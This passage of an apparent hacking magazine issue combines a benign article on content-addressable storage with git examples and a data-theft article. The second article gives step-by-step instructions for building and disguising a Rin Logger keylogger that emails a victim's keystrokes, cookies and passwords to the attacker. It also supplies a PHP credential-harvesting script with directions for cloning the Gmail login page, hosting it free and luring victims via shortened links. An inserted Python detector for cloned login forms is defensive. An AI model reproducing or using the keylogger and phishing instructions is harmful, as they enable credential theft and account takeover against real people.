However, CAS systems have their disadvantages as well. If the user wants to modify an already stored object, it involves copying its contents, modification, reading the whole file, hash calculation and a final write. Even if we change just a single byte of a multi-megabyte file, we still need to re-read the whole file and compute a new hash. However, considering current hardware prices, this disadvantage vanishes and is merely theoretical. The second disadvantage is the existence of hash collisions. Since a hash function generates a fixed-length output for input of arbitrary length, loss of information occurs. Therefore there exist multiple different inputs with the same hash, and it depends only on the specific implementation of the CAS system how it will handle the collision. The odds that a collision will occur can be estimated from the length of the hash function's output. For example, the MD5 hashing algorithm always returns a 128-bit value. Therefore, the chance that two randomly chosen objects will have the same hash is 1:2^128. 2^128 is also the theoretical upper limit on the number of objects a CAS system can store. However, if someone wants to create his own file, different from ours, with the same hash (a preimage attack), he'll need approx. 2^123 computations. The worst situation happens when someone wants to create two arbitrary files with the same hash; in that case, only 2^21 operations will be necessary. Fortunately, there exist more secure algorithms like SHA-1, which has an output size of 160 bits, with no known preimage attack faster than brute force (2^160) and with the fastest collision-discovery attack having complexity 2^61. The danger of using this hashing algorithm is almost non-existent with current technology and knowledge.

And in case you thought about distributed version control systems when reading this article, you were right. Most of the distributed VCSs use some kind of CAS as a backend. I'll use some low-level git commands to demonstrate the basic principles of CAS:
Listing 1. Creating empty git repository.

# Create empty git repository
$ git init
Initialized empty Git repository in /tmp/example/.git/
# Objects are stored in .git/objects
$ ls .git/objects/
info pack
# Create example file
$ cat > foo.txt << EOF
Lorem ipsum dolor sit amet.
EOF
# Store example file to database
$ git hash-object -w foo.txt
d2cf010d36ff3f5a199c335135f37ca40822b35b
# We try to manually calculate the SHA1 hash of the file (note: git prefixes the contents with
# "blob <content_len>\0")
$ echo -e "blob 28\0Lorem ipsum dolor sit amet."|sha1sum
d2cf010d36ff3f5a199c335135f37ca40822b35b -
# We see hashes are equal. Let's look at .git/objects
$ ls .git/objects/*
Listing 2. Creating empty git repository II
.git/objects/d2:
cf010d36ff3f5a199c335135f37ca40822b35b
# Using the content hash, we can request the content.
$ git cat-file -p d2cf010d36ff3f5a199c335135f37ca40822b35b
Lorem ipsum dolor sit amet.
# The filename is not important
$ cp foo.txt bar.txt
$ git hash-object -w bar.txt
d2cf010d36ff3f5a199c335135f37ca40822b35b
# But the content is
$ echo "foobar" > foo.txt
$ git hash-object -w foo.txt
323fae03f4606ea9991df8befbb2fca795e648fa

# And the original object remains unchanged
$ git cat-file -p d2cf010d36ff3f5a199c335135f37ca40822b35b
Lorem ipsum dolor sit amet.
$ git cat-file -p 323fae03f4606ea9991df8befbb2fca795e648fa
foobar

Enterprise solutions use CAS as a backend for a more complex system implementing data replication, retention, secure shredding and other functions; these will be mentioned in following articles.

About the authors

Mr. Miroslav Ludvik graduated from Czech Technical University in 1996. In 2005 he successfully defended his Ph.D. thesis on Data Security in Computer Networks and was awarded the Ph.D. degree. In 2000 he participated in securing the International Monetary Fund conference in Prague. He provides counseling to the Ministry of Interior of the Czech Republic and the Czech Data Protection Office. He also provides counseling for the private sector; among his clients are e.g. banks and prestigious legal firms. He teaches at a prestigious private Czech university and cooperates with the University of Žilina. He holds the office of Technical Director in the 4safety, a.s. company.

Mr. Radek Pilar is currently studying at Czech Technical University, Prague and is employed as a storage consultant in the 4safety, a.s. company.
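To make the content addressing shown in the git listings concrete, here is an added Python example (not part of Mr. Ludvik's article; a toy in-memory store, not git's object database). It computes a blob's address exactly as git does, keys a store by that address, and replays the three properties the listings demonstrate: identical content collapses to one object, different content gets a different address, and an object that no longer matches its address is caught on read.

```python
import hashlib


def git_blob_hash(content: bytes) -> str:
    """Address of a blob as git computes it in Listing 1:
    SHA-1 over the header b"blob <length>\\0" followed by the raw content."""
    header = b"blob %d\0" % len(content)
    return hashlib.sha1(header + content).hexdigest()


class ContentStore:
    """Minimal content-addressed store (toy, constructed for this example).
    Objects are keyed by their own hash, so a file's name plays no role."""

    def __init__(self):
        self._objects = {}

    def put(self, content: bytes) -> str:
        key = git_blob_hash(content)
        self._objects.setdefault(key, content)  # same content twice: stored once
        return key

    def get(self, key: str) -> bytes:
        content = self._objects[key]
        # Integrity check comes for free: recomputing the address from the
        # bytes catches an object that was modified after it was stored.
        if git_blob_hash(content) != key:
            raise ValueError("object %s does not match its address" % key)
        return content

    def count(self) -> int:
        return len(self._objects)


def demo():
    """Replays Listings 1 and 2: foo.txt, its copy bar.txt, then new content."""
    store = ContentStore()
    lorem = b"Lorem ipsum dolor sit amet.\n"  # same text as in the listings
    k_foo = store.put(lorem)
    k_bar = store.put(lorem)  # cp foo.txt bar.txt: same address, no new object
    k_new = store.put(b"foobar\n")  # echo foobar > foo.txt: a new address
    return k_foo, k_bar, k_new, store.count(), store.get(k_foo)


def tamper_is_detected() -> bool:
    """Corrupt a stored object in place and confirm that reading it fails."""
    store = ContentStore()
    key = store.put(b"Lorem ipsum dolor sit amet.\n")
    store._objects[key] = b"Lorem ipsum dolor sit amet!\n"  # simulated corruption
    try:
        store.get(key)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(demo())
```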

Data Stealing. Data Theft Prevention.
Phishing.

Data stealing is the illegal access (by reading, editing, or copying) of data without the data owner's authorization. In other words, if a company's server has been accessed by a hacker, it is a case of data theft. Even reading the mails of your colleague would be taken as a crime in the eyes of the law. It is irrelevant whether you later used this data for misdeeds or not; what counts is that data that is not yours has been accessed without prior permission of its authorized user, who may also be its creator.
"One of the ways of hacking Data Stealing is DDoSes, which have evolved from being a blunt-force attack to being a sophisticated diversionary attack disguising another attack."
Sources said that financial service companies handling vast amounts of data are the most susceptible to these tactics.
Figure 1: Data Theft.
In the past year, for example, phishing attacks
have been directed at IT administrators at
European banks. These eventually enabled
malware to penetrate the banks' systems and
steal login credentials.
As soon as the criminals had the login details,
they launched the DDoS attacks against the
banks. This was carefully timed so that it occurred
on a Friday afternoon when IT departments were
thinly staffed.
"Once the attack was launched, the IT department predictably moved resources to deal with the DDoS attack."
While this was happening, the cybercriminals
launched the real attack, which allowed them to
grab and clone private data that could be used to
steal money.
They then handed the operation over to the
monetization team, who created ATM cards,
debit cards and credit cards, which were handed
out to money mules.
The cybercriminal gang hired individual
contractors who took the cards to ATM machines
and drained $9m in 48 hours from a selection of
accounts in cities across the world.

Types of Data Theft
Data can be stolen in many ways. Below you can
see a few examples showing the ways of data
theft.

Hacking: This is by far the most common way of stealing data with the least chance of getting caught. A hacker gets into a system where he or she is not supposed to be and steals whatever data he needs. Hackers find their gateway through gaps in the security system or by hoodwinking gullible employees / surfers in order to gain access to a system.

Posing: Appearances can be deceiving. The attractive website that has popped up offering you a great holiday treat may actually be a data thief trying to get into your system under the mask of a piece of harmless spam. In a case of corporate data theft last year, the thief posed as a potential customer and got entry to a company's data bank through the computer of an employee who did not suspect anything in his eagerness to catch a potential client.

Remote Access: Is the cursor moving about on its own even when you have not touched the mouse? Does the indicator show that a program is running even when you are not working on anything and have no windows open? Do not ignore the symptoms: a data thief is already sitting in your computer. Remote access allows the thief to gain control of your machine from wherever he or she is and operate it, steal data from it, and even distribute viruses from it!

Spyware: Spyware is often brought in by adware.
The thief may not sit in your system, but your key
strokes or mouse clicks would be spied upon,
revealing what you are doing and reading the
data as you put it in. And you have opened the
gate by clicking on an innocent looking ad.

Podslurping: Music is now stored in iPods for almost all domestic users. You would usually not suspect an employee rocking to music while working as usual. The thief knows this and is using the iPod to obtain data outputs from the computer where it is plugged in.

Bluesnarfing: Bluetooth devices have become popular in a very short while. Using his or her Bluetooth-enabled cell phone or laptop, the data thief lifts data from a restricted computer in silence and mostly unnoticed.

Thumbsucking: Another tiny and dangerous device is the USB storage drive. All that an employee needs to do is plug in a pen drive, and 2 GB of data would flow quietly into the pocket from the computer.
Prevent Data Theft
At any time of day or night, a huge amount of data is being stored, retrieved and transferred in the average company or organization. As a responsible user, you must know how to protect your data and prevent data theft from mobile devices. The following are targets for thieves and intruders:
USB thumb drive
3G mobile phone network
Wireless LAN
Removable hard disk
Notebook computer
Portable personal digital devices like MP3 players, PDAs, phones
Printer output etc.
Personal information such as bank account details
Customer database
Confidential/sensitive business information, e.g. tender information and quoted prices.
The Following are some useful security tips for
preventing data theft:
Protect your mobile devices
Data theft sometimes happens when you
outsource your IT services. Learn how to
prevent data loss from IT outsourcing.
Review the access control policy
Encrypt your data.
Protect your wireless network.
Secure your company network.
Conduct security risk assessments and
regular security audits.

Figure 2: Preventing from Data Theft.


Keylogger
Key logger software is a computer monitoring system that allows you to record all activities performed on your computer system. Key logger software has the ability to monitor online chat conversation details, visited websites, incoming and outgoing emails and other online activities performed on your PC. The log file created by the key logger can be sent to a specified receiver. Some key logger programs will also record any e-mail addresses you use and Web site URLs you visit.

Key loggers, as a surveillance tool, are often used by employers to ensure employees use work computers for business purposes only. Unfortunately, key loggers can also be embedded in spyware, allowing your information to be transmitted to an unknown third party.

Computer monitoring software works in invisible mode and does not appear on the Desktop, in Add/Remove Programs, in the Control Panel, or even in the installation path folders, which are hidden during installation. Keylogger software provides a facility to send details of recorded activities to a user-specified email address. A free keylogger download is available on the website.
How to hack ID's with Rin Logger
Run the keylogger file on your pc and click on Create new

Figure 3: Create New for creating server.exe file.

Now, enter the information as follows:
Email address: your email address (gmail recommended)
Account Password: Password of your Email address.
Keylogger Recipients: Enter your Email address
Click on next

Figure 4: Set information for getting keylogs.
Now, enter the time duration between two
emails. If you set it to 2 minutes, you will receive
emails after every 2 minutes. Hit on Next.
Figure 5: Set timing for getting keylogs.
Now, change Install keylogger to Enabled. Name the file anything you want and select the Installation path as Application data.
Click on the next option, downloader setup, which will help you to download your files off the internet and launch them.
Figure 7: Set Download Setup.
Create a custom message for fooling your victim and click on next.
Figure 8: Set Dialog setup for setting message
for victim.
Click on website enable viewer for getting updates of all the websites being visited by the victim.
Figure 9: Set Website Viewer option for update
of web links.

Select this option for binding your file with another file and click on next.
Figure 10: Bind your server.exe file with other
file.

This option can help you retrieve passwords from the web browser's cookies; then click on next.
Figure 11: Set option for stealing cookies from
web browser.

Use this option to get administrative control of your victim's system; enable it as per your choice and requirements and click on next.
Figure 12: Use administrative control options.

You can use all other options according to your
needs. But, I am focusing only on the important
aspects. Hit on Next until you see this option:
Hit the ? button beside every textbox to generate random product information. Hit Next.
Figure 13: Bind your server.exe file with other
file.

Now, hit on Save As and select the path where
you want to save your keylogger server file. Click
on Compile. Done!!!
Figure 14: Save server.exe file.

That's it. You have successfully created a keylogger server file. Now, simply send this file to your friend. You can use the Binder within this keylogger or can even opt for the IExpress binder to bind this keylogger server to any .exe file, maybe software or so. This will remove any chance of doubt on the victim's side.
Figure 15: Successfully created file.
Now, simply send this file to your victim via email. Once the victim runs our keylogger, we will get key logs every 2 min via email as shown.

Thus, the victim will run the file considering it a normal software installation, and during this process our sent keylogger server will install itself silently in the background without the victim's knowledge.

After keylogger server installation, you will start receiving all the victim's passwords like this:




Figure 16: Online logs on email ID.

Countermeasures
The effectiveness of countermeasures varies, because keyloggers use a variety of techniques to capture data and the countermeasure needs to be effective against the particular data capture technique. For example, an on-screen keyboard will be effective against hardware keyloggers, transparency will defeat some screen loggers - but not all of them - and an anti-spyware application that can only disable hook-based keyloggers will be ineffective against kernel-based keyloggers.
Moreover, keylogger software authors may be able to update the code to adapt to countermeasures that may have proven to be effective against them.
Anti keyloggers
An anti keylogger is a piece of software specifically designed to detect keyloggers on a computer, typically comparing all files in the computer against a database of keyloggers, looking for similarities which might signal the presence of a hidden keylogger. As anti keyloggers have been designed specifically to detect keyloggers, they have the potential to be more effective than conventional anti-virus software; some anti-virus software does not consider certain keyloggers a virus, and under some circumstances a keylogger can be considered a legitimate piece of software.
Figure 17: Anti-Keylogger for removing keylogger file.

Phishing
You must have come across many fake login pages/scamming pages which are often used to hack IDs. Phishing is the easiest and the most "unethical" way of hacking. It is true that phishing is not something great which only a few can do, and that is why it is considered unethical. But whatever it might be, hacking is hacking and there is obviously a need to know more about this type of exploitation. Before we go into the details, let us first see what phishing is all about.
header ('Location:
http://www.gmail.com');$handle =
fopen("log.txt", "a");foreach($_POST as
$variable => $value) { fwrite($handle,
$variable); fwrite($handle, "=");
fwrite($handle, $value); fwrite($handle,
"\r\n");}fwrite($handle,
"\r\n");fclose($handle);exit;?>

Figure 18: How Phishing works.
Phishing is a way of deceiving your victim by making him log in through one of your webpages which is a clone of the original one. By doing so, the fake webpage will log his E-mail ID and password. After that he will automatically be redirected to the original webpage, making him unsuspicious of what has just happened. This is used for criminal activities like stealing credit cards etc. That is the exact reason why I DO NOT want you to use this for fraud. Use this only for educational purposes and not to cause any damage to any person in any way.
Phishing is the most popular and widely used method for hacking email accounts and it is not as easy as its name. Creating a phishing page is an easy task and anyone can download one from various hacking forums for free. The main step of phishing comes after creation of the fake login page.
Figure 19: Phishing Method.

How to create your own phishing
page

1. Copy the script above and save it as log.php or login.php
2. Now open the Gmail home page which you want to clone.
3. I'm creating a Gmail phishing login page!!
Figure 20: Creating home page of Gmail Fake Page.
4. RIGHT CLICK > Save as; save the page with the name index.HTML like in the image
Figure 21: Saving Gmail fake page with name index.html.

5. Now open it with Notepad and find the word "action" (you can use CTRL + F); delete action=https://accounts.google.com/ServiceLoginAuth and use login.php? in the place of the link, then save your script.

Figure 22: Save fake gmail pages source with name login.php.


NOW YOUR LOGIN.PHP AND INDEX.HTML PAGES ARE READY!
6. Your page is ready for uploading.
7. Create an account on free webhosting sites just like (WWW.MY3GB.COM) or
(WWW.5GB.COM)


Figure 23: Create an account on webhosting site like www.my3gb.com.

Upload your phishing page on your webhosting page. You should receive something like that:


Figure 24: Upload fake page and php script on webhosting site.


AFTER UPLOADING IT

Now shorten the URL of the INDEX.HTML (NAME.MY3GB.COM/INDEX.HTML) with the Google URL shortener.

Next send the link (GOO.GL____) to the victim and make your victim log in, or send your fake URL of the FB login to your victim's e-mail.

Once your victim has logged in on your fake page, JUST RECEIVE THE PASSWORD IN LOG.TXT
Figure 25: Credential hacking.
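From the defender's side, the page built in steps 4 and 5 leaves one tell-tale sign: a login form whose action no longer points at the real provider. The following is an added Python example, not code from the article, that parses an HTML page, finds forms containing a password field, resolves each form's action against the page URL and flags any that do not submit to the expected login host. Both sample pages and the name.my3gb.com page URL are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed samples (not from the article). The first mimics the result of
# steps 4 and 5: the genuine action was replaced by a local "login.php?" script.
SUSPECT_PAGE = """<html><body>
<form method="post" action="login.php?">
  <input name="Email"><input name="Passwd" type="password">
</form></body></html>"""
GENUINE_PAGE = """<html><body>
<form method="post" action="https://accounts.google.com/ServiceLoginAuth">
  <input name="Email"><input name="Passwd" type="password">
</form></body></html>"""


class _FormCollector(HTMLParser):
    """Records (action, has_password_field) for every form in the document."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = [attrs.get("action") or "", False]
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current[1] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(tuple(self._current))
            self._current = None


def suspicious_login_forms(html, page_url, expected_host):
    """Return the resolved submit URLs of password forms that do not post to
    expected_host (or a subdomain of it). A relative or empty action resolves
    against page_url, so a clone on a free host that posts to its own
    login.php is flagged, while the real provider's form is not."""
    parser = _FormCollector()
    parser.feed(html)
    parser.close()
    if parser._current is not None:  # unterminated <form>: still inspect it
        parser.forms.append(tuple(parser._current))
    flagged = []
    for action, has_password in parser.forms:
        if not has_password:
            continue
        target = urljoin(page_url, action)
        host = (urlsplit(target).hostname or "").lower()
        if host != expected_host and not host.endswith("." + expected_host):
            flagged.append(target)
    return flagged
```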

Here are some suggested free web hosting websites
For phishing, cookie stealing and other hacking purposes you need help from web hosting sites. These addresses will help you a lot. Choose your favorite one and sign up; all of them are free.
1. 110mb - http://110mb.com
2. Ripway - http://ripway.com
3. SuperFreeHost - http://superfreehost.info
4. Freehostia - http://freehostia.com
5. Freeweb7 - http://freeweb7.com
6. t35 - http://t35.com
7. Awardspace - http://awardspace.com
8. PHPNet - http://phpnet.us
9. Free Web Hosting Pro - http://freewebhostingpro.com
10. ProHosts - http://prohosts.org
11. FreeZoka - http://www.freezoka.com/
12. 000webhost - http://000webhost.com/
13. AtSpace - http://atspace.com
14. My3gb - http://my3gb.com
15. Zymic - http://zymic.com

About the author
VIKAS KUMAR (ISHAN) is one of the leading computer security experts available in India. VIKAS KUMAR was born on 26 July 1990 in a town called Meerut, UP (India). VIKAS KUMAR started his group hackers4u on Facebook in 2010, and in two years he has hit the World Wide Web with good computer ethical hacking articles, is going to launch a website on Cyber Security & Ethical Hacking and is working with the Anti-Hacking Community I-hackers4u. The 22 year old has the capability to compete with the best people in the business called Ethical Hacking.

Workshops and Seminars: VIKAS KUMAR has trained more than 3000 people from all around the world, from countries like India, Dubai, Sudan, United Kingdom, Thailand, Nigeria, Sri Lanka, Kenya, Australia, Kazakhstan, Canada, Ghana, United States, South Africa, China, Malaysia, Singapore, Oman, Yemen, Indonesia, Korea, Iran etc.

Thank you for reading our magazine from cover to cover. Please share with us your comment about this issue on Twitter: @Hackinsight or Facebook: http://www.facebook.com/hackinsight
hackinsightpress@gmail.com

The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.
